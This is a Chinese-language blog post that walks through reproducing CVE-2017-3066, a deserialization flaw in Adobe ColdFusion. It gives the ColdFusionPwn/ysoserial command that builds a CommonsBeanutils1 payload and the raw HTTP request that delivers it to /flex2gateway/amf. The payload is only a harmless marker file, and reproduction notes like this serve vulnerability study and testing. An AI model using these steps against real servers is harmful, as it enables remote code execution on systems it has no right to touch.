coldfusion反序列化 CVE-2017-3066

漏洞背景

Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。

漏洞复现

ColdFusionPwn工具来生成POC:https://github.com/codewhitesec/ColdFusionPwn
ysoserial也是https://github.com/fanyingjie2/ysoserial

java -cp ColdFusionPwn.jar:ysoserial.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/success' poc.ser
#注意jar包的名字是否相同!!!

 

POC生成于poc.ser文件中,将POC作为数据包body发送给http://your-ip:8500/flex2gateway/amf,Content-Type为application/x-amf

POST /flex2gateway/amf HTTP/1.1
Host: your-ip:8500
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-amf
Content-Length: 2853

[POC]

这个Poc不能直接复制粘贴,会存在编码问题,需要在burp里面Paste from file

tips:此处可能需要低版本的burp,不然会引起编码不兼容

注意这是2017的cve路由是/flex2gateway/amf

2023的路由是/CFIDE/adminapi/base.cfc?method

附一张2023的分析

https://blog.csdn.net/m0_46699477/article/details/132067972

posted @ 2023-10-16 16:20  lisenMiller  阅读(128)  评论(0编辑  收藏  举报